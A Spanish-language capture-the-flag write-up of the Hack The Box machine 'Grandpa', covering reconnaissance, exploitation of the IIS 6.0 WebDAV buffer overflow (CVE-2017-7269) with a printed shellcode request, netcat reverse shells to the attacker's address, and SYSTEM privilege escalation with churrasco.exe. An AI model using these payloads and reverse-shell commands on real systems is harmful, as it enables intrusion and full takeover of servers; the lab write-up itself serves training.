Grandpa
Skills
- Microsoft IIS 6.0 - WebDAV ‘ScStoragePathFromUrl’ Remote Buffer Overflow [RCE]
- Token Kidnapping - Churrasco [Privilege Escalation]
Certificaciones
- eJPT
- eWPT
- OSCP
Descripción
Grandpa es una máquina easy windows, explotaremos webdav meidante el CVE-2017-7269 mediante la cual obtendremos una consola a nuestro equipo y obtendremos acceso a la máquina víctima. Posteriormente nos convertiremos en Administrator abusando de los privilegios de nuestro usuario usando la herramienta churrasco.exe
Reconocimiento
Se comprueba que la máquina está activa y se determina su sistema operativo, el ttl de las máquinas windows suele ser 128, en este caso hay un nodo intermediario que hace que el ttl disminuya en una unidad
1
2
3
4
5
6
7
8
# ping 10.129.95.233
PING 10.129.95.233 (10.129.95.233) 56(84) bytes of data.
64 bytes from 10.129.95.233: icmp_seq=1 ttl=127 time=57.8 ms
64 bytes from 10.129.95.233: icmp_seq=2 ttl=127 time=59.6 ms
^C
--- 10.129.95.233 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 57.827/58.705/59.584/0.878 ms
Nmap
Se va a realizar un escaneo de todos los puertos abiertos en el protocolo TCP a través de nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# sudo nmap -p- --open --min-rate 5000 -sS -n -Pn -v 10.129.95.233 -oG openPorts
[sudo] password for justice-reaper:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-22 13:32 CEST
Initiating SYN Stealth Scan at 13:32
Scanning 10.129.95.233 [65535 ports]
Discovered open port 80/tcp on 10.129.95.233
Completed SYN Stealth Scan at 13:32, 30.95s elapsed (65535 total ports)
Nmap scan report for 10.129.95.233
Host is up (0.71s latency).
Not shown: 65534 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 31.02 seconds
Raw packets sent: 131087 (5.768MB) | Rcvd: 20 (880B)
Se procede a realizar un análisis de detección de servicios y la identificación de versiones utilizando los puertos abiertos encontrados
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
# nmap -sCV -p 80 10.129.95.233 -oN services
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-22 13:37 CEST
Nmap scan report for 10.129.95.233
Host is up (0.062s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
| http-webdav-scan:
| Server Date: Mon, 22 Jul 2024 11:37:44 GMT
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| WebDAV type: Unknown
| Server Type: Microsoft-IIS/6.0
|_ Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.28 seconds
Web Enumeration
Esto es lo que vemos al acceder a la web
Web Exploitation
La web tiene dispone del servicio webdav y el IIS tiene la versión 6.0 por lo tanto es vulnerable a Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow el CVE es 2017-7269. El exploit usado es https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269, antes de ejecutar el exploit nos ponemos en escucha con netcat por el puerto 4444
1
# nc -nlvp 4444
Ejecutamos el exploit
1
2
3
4
5
# python2 iis6_exploit.py 10.129.95.233 80 10.10.16.16 4444
PROPFIND / HTTP/1.1
Host: localhost
Content-Length: 1744
If: <http://localhost/aaaaaaa潨硣睡焳椶䝲稹䭷佰畓穏䡨噣浔桅㥓偬啧杣㍤䘰硅楒吱䱘橑牁䈱瀵塐㙤汇㔹呪倴呃睒偡㈲测水㉇扁㝍兡塢䝳剐㙰畄桪㍴乊硫䥶乳䱪坺潱塊㈰㝮䭉前䡣潌畖畵景癨䑍偰稶手敗畐橲穫睢癘扈攱ご汹偊呢倳㕷橷䅄㌴摶䵆噔䝬敃瘲牸坩䌸扲娰夸呈ȂȂዀ栃汄剖䬷汭佘塚祐䥪塏䩒䅐晍Ꮐ栃䠴攱潃湦瑁䍬Ꮐ栃千橁灒㌰塦䉌灋捆关祁穐䩬> (Not <locktoken:write1>) <http://localhost/bbbbbbb祈慵佃潧歯䡅㙆杵䐳㡱坥婢吵噡楒橓兗㡎奈捕䥱䍤摲㑨䝘煹㍫歕浈偏穆㑱潔瑃奖潯獁㑗慨穲㝅䵉坎呈䰸㙺㕲扦湃䡭㕈慷䵚慴䄳䍥割浩㙱乤渹捓此兆估硯牓材䕓穣焹体䑖漶獹桷穖慊㥅㘹氹䔱㑲卥塊䑎穄氵婖扁湲昱奙吳ㅂ塥奁煐〶坷䑗卡Ꮐ栃湏栀湏栀䉇癪Ꮐ栃䉗佴奇刴䭦䭂瑤硯悂栁儵牺瑺䵇䑙块넓栀ㅶ湯ⓣ栁ᑠ栃̀翾Ꮐ栃Ѯ栃煮瑰ᐴ栃⧧栁鎑栀㤱普䥕げ呫癫牊祡ᐜ栃清栀眲票䵩㙬䑨䵰艆栀䡷㉓ᶪ栂潪䌵ᏸ栃⧧栁VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBRDDKLMN8KPM0KP4KOYM4CQJINDKSKPKPTKKQTKT0D8TKQ8RTJKKX1OTKIGJSW4R0KOIBJHKCKOKOKOF0V04PF0M0A>
Obtenemos acceso a la máquina víctima
1
2
3
4
5
6
7
8
9
10
11
# nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.16.16] from (UNKNOWN) [10.129.95.233] 1031
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>
c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service
Privilege escalation
Listamos privilegios de nuestro usuario y nos damos cuenta de que tenemos el privilegio SeImpersonatePrivilege por lo tanto podemos convertirnos en Administrator https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens#seimpersonateprivilege
1
2
3
4
5
6
7
8
9
10
11
12
13
14
c:\windows\system32\inetsrv>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAuditPrivilege Generate security audits Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
Listamos información del sistema para ver a que versión de windows nos estamos enfrentando
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
c:\windows\system32\inetsrv>systeminfo
systeminfo
Host Name: GRANDPA
OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version: 5.2.3790 Service Pack 2 Build 3790
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Uniprocessor Free
Registered Owner: HTB
Registered Organization: HTB
Product ID: 69712-296-0024942-44782
Original Install Date: 4/12/2017, 5:07:40 PM
System Up Time: 0 Days, 4 Hours, 53 Minutes, 8 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 25 Model 1 Stepping 1 AuthenticAMD ~2595 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory: 1,023 MB
Available Physical Memory: 648 MB
Page File: Max Size: 2,470 MB
Page File: Available: 2,191 MB
Page File: In Use: 279 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): 1 Hotfix(s) Installed.
[01]: Q147222
Network Card(s): N/A
Como estamos ante un Windows Server 2003 debemos usar churrasco para escalar privilegios https://kashz.gitbook.io/kashz-jewels/services/windows-token-exploits#churrasco. El binario lo he descargado de https://the-pentesting-guide.marmeus.com/local_privilege_escalation/windows#token-kidnapping. Una vez descargado nos montamos un servidor smb en el mismo directorio donde está churrasco.exe
1
# impacket-smbserver smbFolder $(pwd) -smb2support
Antes de descargarnos el binarios vamos a crear una carpeta en el directorio temporal de windows para descargar el archivo desde ahí
1
C:\WINDOWS\Temp\test> copy \\10.10.16.16\smbFolder\churrasco.exe
Nos copiamos también el netcat
1
C:\WINDOWS\Temp\test>copy \\10.10.16.16\smbFolder\nc.exe
Ejecutamos el binario para comprobar que funciona correctamente
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
C:\WINDOWS\Temp\test>churrasco.exe -d "whoami"
churrasco.exe -d "whoami"
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 668
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 472
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 672
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 676
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 684
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0xf18
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found SYSTEM token 0xf10
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM!
nt authority\system
Nos mandamos una shell a nuestro equipo mediante netcat
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
C:\WINDOWS\Temp\test>churrasco.exe -d "C:\WINDOWS\Temp\test\nc.exe -e cmd 10.10.16.16 1234"
churrasco.exe -d "C:\WINDOWS\Temp\test\nc.exe -e cmd 10.10.16.16 1234"
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 668
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 472
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 672
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 676
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 684
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0xf18
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found SYSTEM token 0xf10
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM!
Nos convertimos en nt authority\system
1
2
3
4
5
6
7
8
9
# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.16.16] from (UNKNOWN) [10.129.95.233] 1106
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\TEMP>whoami
whoami
nt authority\system